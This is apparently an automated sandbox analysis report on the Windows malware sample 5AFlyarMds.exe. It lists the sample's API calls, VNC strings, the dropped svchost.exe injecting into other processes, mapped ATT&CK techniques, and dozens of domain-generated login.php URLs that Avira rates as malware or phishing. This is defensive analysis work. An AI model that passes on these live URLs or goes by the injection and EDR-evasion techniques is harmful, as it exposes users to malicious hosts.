    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_00402360 CreateFileA,WriteFile,WriteFile,GetSystemTimeAsFileTime,WriteFile,CloseHandle,0_2_00402360
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_00403A20 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,0_2_00403A20
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CA6970 memset,GetProcessHeap,HeapAlloc,memset,GetTimeZoneInformation,Sleep,IsUserAnAdmin,GetTickCount,_snprintf,GetTempPathA,GetTempFileNameA,SetFileAttributesA,DeleteFileA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,SetFileAttributesA,DeleteFileA,Sleep,Sleep,1_2_02CA6970
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_004034C0 GetVersionExA,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,0_2_004034C0
    Source: 5AFlyarMds.exeBinary or memory string: S:(ML;;NRNWNX;;;LW)

    Remote Access Functionality

    barindex
    Contains VNC / remote desktop functionality (version string found)
    Source: 5AFlyarMds.exeString found in binary or memory: RFB 003.006
    Source: 5AFlyarMds.exe, 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: RFB 003.006
    Source: 5AFlyarMds.exe, 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: $BRFB 003.006
    Source: 5AFlyarMds.exe, 00000000.00000003.1736218436.00000000006FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: 5AFlyarMds.exe, 00000000.00000003.1736218436.00000000006FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: svchost.exeString found in binary or memory: RFB 003.006
    Source: svchost.exeString found in binary or memory: RFB 003.006
    Source: svchost.exe, 00000001.00000002.2975747606.00000000029B0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: svchost.exe, 00000001.00000002.2975747606.00000000029B0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: svchost.exe, 00000001.00000003.2116591333.00000000039C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: svchost.exe, 00000001.00000003.2116591333.00000000039C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: svchost.exe, 00000001.00000003.1744696339.0000000000888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: svchost.exe, 00000001.00000003.1744696339.0000000000888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: svchost.exe, 00000001.00000002.2976326837.0000000002CF3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: svchost.exe, 00000001.00000002.2976326837.0000000002CF3000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: svchost.exe, 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: svchost.exe, 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: svchost.exe, 00000001.00000002.2975747606.0000000002A06000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: svchost.exe, 00000001.00000002.2975747606.0000000002A06000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: svchost.exe, 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: RFB 003.006
    Source: svchost.exe, 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exeString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exeString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 00000005.00000002.2309709711.00000000015E0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 00000005.00000002.2309709711.00000000015E0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exe, 00000005.00000002.2310035862.0000000002F60000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 00000005.00000002.2310035862.0000000002F60000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exeString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exeString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 00000006.00000002.2323573296.0000000002550000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 00000006.00000002.2323573296.0000000002550000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exe, 00000006.00000002.2323493665.00000000023F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 00000006.00000002.2323493665.00000000023F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exeString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exeString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 00000008.00000002.2334858118.00000000025C0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 00000008.00000002.2334858118.00000000025C0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exe, 00000008.00000002.2334780970.0000000002520000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 00000008.00000002.2334780970.0000000002520000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exe, 0000000D.00000002.2347000014.0000000002E40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 0000000D.00000002.2347000014.0000000002E40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exe, 0000000D.00000002.2347461629.0000000003100000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 0000000D.00000002.2347461629.0000000003100000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exe, 0000000F.00000002.2112522705.00000000024E0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 0000000F.00000002.2112522705.00000000024E0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exe, 0000000F.00000002.2112434422.0000000002480000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 0000000F.00000002.2112434422.0000000002480000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exe, 00000013.00000002.2113815315.0000000002540000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 00000013.00000002.2113815315.0000000002540000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exe, 00000013.00000002.2114823849.0000000002910000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 00000013.00000002.2114823849.0000000002910000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exe, 00000015.00000002.2119300730.00000000022D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 00000015.00000002.2119300730.00000000022D0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exe, 00000015.00000002.2119609866.00000000024B0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 00000015.00000002.2119609866.00000000024B0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exe, 00000017.00000002.2120228960.0000000002E40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 00000017.00000002.2120228960.0000000002E40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exe, 00000017.00000002.2120830314.0000000003200000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 00000017.00000002.2120830314.0000000003200000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exe, 00000019.00000002.2124213315.00000000008F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 00000019.00000002.2124213315.00000000008F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exe, 00000019.00000002.2124084846.0000000000890000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 00000019.00000002.2124084846.0000000000890000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exe, 0000001B.00000002.2126205049.0000000001590000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 0000001B.00000002.2126205049.0000000001590000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exe, 0000001B.00000002.2126064053.00000000014F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 0000001B.00000002.2126064053.00000000014F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exe, 0000001D.00000002.2129537008.0000000002CC0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 0000001D.00000002.2129537008.0000000002CC0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exe, 0000001D.00000002.2129989380.0000000002E60000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 0000001D.00000002.2129989380.0000000002E60000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exe, 0000001F.00000002.2132321964.0000000001040000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 0000001F.00000002.2132321964.0000000001040000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exe, 0000001F.00000002.2132243735.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 0000001F.00000002.2132243735.0000000000FE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exe, 00000021.00000002.2137945302.00000000032F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 00000021.00000002.2137945302.00000000032F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exe, 00000021.00000002.2137351546.0000000003150000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 00000021.00000002.2137351546.0000000003150000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exe, 00000023.00000002.2140900930.0000000002060000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 00000023.00000002.2140900930.0000000002060000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exe, 00000023.00000002.2141147552.00000000020C0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 00000023.00000002.2141147552.00000000020C0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exe, 00000025.00000002.2162183852.0000000002D30000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 00000025.00000002.2162183852.0000000002D30000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exe, 00000025.00000002.2196325430.0000000003140000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 00000025.00000002.2196325430.0000000003140000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exe, 00000027.00000002.2148807567.0000000002BE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 00000027.00000002.2148807567.0000000002BE0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: cUKxeliGgCix.exe, 00000027.00000002.2148506463.0000000001270000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
    Source: cUKxeliGgCix.exe, 00000027.00000002.2148506463.0000000001270000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CA9E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,1_2_02CA9E40
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CC1250 htons,socket,setsockopt,closesocket,bind,listen,1_2_02CC1250
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CC0480 setsockopt,htons,socket,setsockopt,bind,1_2_02CC0480
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F91250 htons,socket,setsockopt,closesocket,bind,listen,5_2_02F91250
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F79E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,5_2_02F79E40
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F90480 setsockopt,htons,socket,setsockopt,bind,5_2_02F90480
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02581250 htons,socket,setsockopt,closesocket,bind,listen,6_2_02581250
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02569E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,6_2_02569E40
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02580480 setsockopt,htons,socket,setsockopt,bind,6_2_02580480
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025F1250 htons,socket,setsockopt,closesocket,bind,listen,8_2_025F1250
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025D9E40 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,8_2_025D9E40
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025F0480 setsockopt,htons,socket,setsockopt,bind,8_2_025F0480

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire Infrastructure1
    Valid Accounts    		23
    Native API    		1
    DLL Side-Loading    		1
    Abuse Elevation Control Mechanism    		1
    Disable or Modify Tools    		111
    Input Capture    		2
    System Time Discovery    		1
    Remote Desktop Protocol    		1
    Archive Collected Data    		4
    Ingress Tool Transfer    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts2
    Command and Scripting Interpreter    		1
    Create Account    		1
    DLL Side-Loading    		1
    Abuse Elevation Control Mechanism    		LSASS Memory11
    Account Discovery    		Remote Desktop Protocol1
    Screen Capture    		11
    Encrypted Channel    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    Scheduled Task/Job    		1
    Valid Accounts    		1
    Valid Accounts    		1
    Obfuscated Files or Information    		Security Account Manager1
    System Network Connections Discovery    		SMB/Windows Admin Shares111
    Input Capture    		11
    Non-Standard Port    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCron1
    Scheduled Task/Job    		11
    Access Token Manipulation    		31
    Software Packing    		NTDS2
    File and Directory Discovery    		Distributed Component Object Model2
    Clipboard Data    		1
    Remote Access Software    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchd1
    Registry Run Keys / Startup Folder    		613
    Process Injection    		1
    DLL Side-Loading    		LSA Secrets143
    System Information Discovery    		SSHKeylogging3
    Non-Application Layer Protocol    		Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
    Bootkit    		1
    Scheduled Task/Job    		322
    Masquerading    		Cached Domain Credentials1
    Query Registry    		VNCGUI Input Capture14
    Application Layer Protocol    		Data Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
    Registry Run Keys / Startup Folder    		1
    Valid Accounts    		DCSync351
    Security Software Discovery    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
    Virtualization/Sandbox Evasion    		Proc Filesystem151
    Virtualization/Sandbox Evasion    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
    Access Token Manipulation    		/etc/passwd and /etc/shadow13
    Process Discovery    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron613
    Process Injection    		Network Sniffing11
    Application Window Discovery    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
    Bootkit    		Input Capture1
    System Owner/User Discovery    		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1507126 Sample: 5AFlyarMds.exe Startdate: 08/09/2024 Architecture: WINDOWS Score: 100 47 www.sedoparking.com 2->47 49 vowyzuf.com 2->49 51 1007 other IPs or domains 2->51 65 Suricata IDS alerts for network traffic 2->65 67 Malicious sample detected (through community Yara rule) 2->67 69 Antivirus detection for URL or domain 2->69 71 17 other signatures 2->71 9 5AFlyarMds.exe 2 3 2->9         started        signatures3 process4 file5 35 C:\Windows\apppatch\svchost.exe, PE32 9->35 dropped 37 C:\Windows\...\svchost.exe:Zone.Identifier, ASCII 9->37 dropped 73 Detected unpacking (changes PE section rights) 9->73 75 Detected unpacking (overwrites its own PE header) 9->75 77 Moves itself to temp directory 9->77 79 8 other signatures 9->79 13 svchost.exe 1 81 9->13         started        signatures6 process7 dnsIp8 53 vonycum.com 13->53 55 volydyk.com 13->55 57 34 other IPs or domains 13->57 81 Antivirus detection for dropped file 13->81 83 System process connects to network (likely due to code injection or exploit) 13->83 85 Detected unpacking (changes PE section rights) 13->85 87 19 other signatures 13->87 17 cUKxeliGgCix.exe 13->17 injected 20 cUKxeliGgCix.exe 13->20 injected 22 cUKxeliGgCix.exe 13->22 injected 24 13 other processes 13->24 signatures9 process10 signatures11 59 Monitors registry run keys for changes 17->59 61 Contains VNC / remote desktop functionality (version string found) 17->61 63 Found direct / indirect Syscall (likely to bypass EDR) 17->63 26 WerFault.exe 21 24->26         started        29 WerFault.exe 24->29         started        31 WerFault.exe 24->31         started        33 WerFault.exe 24->33         started        process12 file13 39 C:\ProgramData\Microsoft\...\Report.wer, Unicode 26->39 dropped 41 C:\ProgramData\Microsoft\...\Report.wer, Unicode 29->41 dropped 43 C:\ProgramData\Microsoft\...\Report.wer, Unicode 31->43 dropped 45 C:\ProgramData\Microsoft\...\Report.wer, Unicode 33->45 dropped

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    5AFlyarMds.exe100%AviraTR/Crypt.XPACK.Gen
    5AFlyarMds.exe100%Joe Sandbox ML

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Windows\apppatch\svchost.exe100%AviraTR/Crypt.XPACK.Gen
    C:\Windows\apppatch\svchost.exe100%Joe Sandbox ML

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://qeqyreq.com/login.phpg0%Avira URL Cloudsafe
    http://vopycoc.com/login.php100%Avira URL Cloudmalware
    http://qekynog.com/login.php0%Avira URL Cloudsafe
    http://gaqykoz.com/login.php100%Avira URL Cloudphishing
    http://puvyjiq.com/http://galyfez.com/http://lyxygur.com/http://puvyjiq.com/http://lygyvon.com/http:100%Avira URL Cloudphishing
    http://qeqynel.com/login.php80%Avira URL Cloudsafe
    http://gatypas.com/login.php0%Avira URL Cloudsafe
    http://lygytyd.com/login.php=0%Avira URL Cloudsafe
    http://volycik.com/login.phpM0%Avira URL Cloudsafe
    http://qegytop.com/100%Avira URL Cloudphishing
    http://qebylyp.com/login.php?0%Avira URL Cloudsafe
    http://gadycew.com/login.php0%Avira URL Cloudsafe
    http://vowyrif.com/login.php0%Avira URL Cloudsafe
    http://lyxyvyn.com/login.php100%Avira URL Cloudphishing
    http://vowydef.com/login.php100%Avira URL Cloudmalware
    http://lygymod.com/H0%Avira URL Cloudsafe
    http://gadyfys.com/H100%Avira URL Cloudmalware
    http://qexynyq.com/login.php0%Avira URL Cloudsafe
    http://qeqyxil.com/H100%Avira URL Cloudmalware
    http://lyvytud.com/login.php100%Avira URL Cloudphishing
    http://lysyvax.com/login.php100%Avira URL Cloudmalware
    http://puzytul.com/login.php0%Avira URL Cloudsafe
    http://qedyxel.com/login.php/0%Avira URL Cloudsafe
    http://qexyfuq.com/login.php100%Avira URL Cloudphishing
    http://qebyqeq.com/login.php0%Avira URL Cloudsafe
    http://lyryled.com/login.php100%Avira URL Cloudmalware
    http://qexyvoq.com/login.php0%Avira URL Cloudsafe
    http://gaqycow.com/login.php0%Avira URL Cloudsafe
    http://lymyner.com/login.php0%Avira URL Cloudsafe
    http://qekyfeg.com/100%Avira URL Cloudphishing
    http://gahyvab.com/login.php0%Avira URL Cloudsafe
    http://gacyhez.com/login.php0%Avira URL Cloudsafe
    http://lygytyd.com/login.php0%Avira URL Cloudsafe
    http://vowyrym.com/login.php0%Avira URL Cloudsafe
    http://lygyvar.com/0%Avira URL Cloudsafe
    http://qedyhyl.com/login.php100%Avira URL Cloudphishing
    http://pufytip.com/login.php0%Avira URL Cloudsafe
    http://pujyteq.com/login.php0%Avira URL Cloudsafe
    http://volydyk.com/100%Avira URL Cloudmalware
    http://vojyduf.com/login.php0%Avira URL Cloudsafe
    http://gatykyh.com/login.php100%Avira URL Cloudmalware
    http://pujygaq.com/0%Avira URL Cloudsafe
    http://vofypam.com/login.php100%Avira URL Cloudphishing
    http://qetyvil.com/login.php100%Avira URL Cloudmalware
    http://vowykaf.com/login.php100%Avira URL Cloudphishing
    http://gadyniw.com/login.php100%Avira URL Cloudmalware
    http://lysynaj.com/login.php0%Avira URL Cloudsafe
    http://qegyval.com/login.php100%Avira URL Cloudmalware
    http://gaqyres.com/login.php0%Avira URL Cloudsafe
    http://lyvymir.com/login.php100%Avira URL Cloudmalware
    http://lyxygur.com/login.php0%Avira URL Cloudsafe
    http://gacycaz.com/login.php100%Avira URL Cloudphishing
    http://lygymod.com/(.0%Avira URL Cloudsafe
    http://puzybil.com/login.php0%Avira URL Cloudsafe
    http://gadyhoh.com/login.php0%Avira URL Cloudsafe
    http://gadydow.com/login.php0%Avira URL Cloudsafe
    http://gahynuw.com/login.php100%Avira URL Cloudmalware
    http://qetylyv.com/0%Avira URL Cloudsafe
    http://qegyfyp.com/login.php100%Avira URL Cloudmalware
    http://lyxygax.com/login.php0%Avira URL Cloudsafe
    http://qexyhuv.com/login.phpC:100%Avira URL Cloudmalware
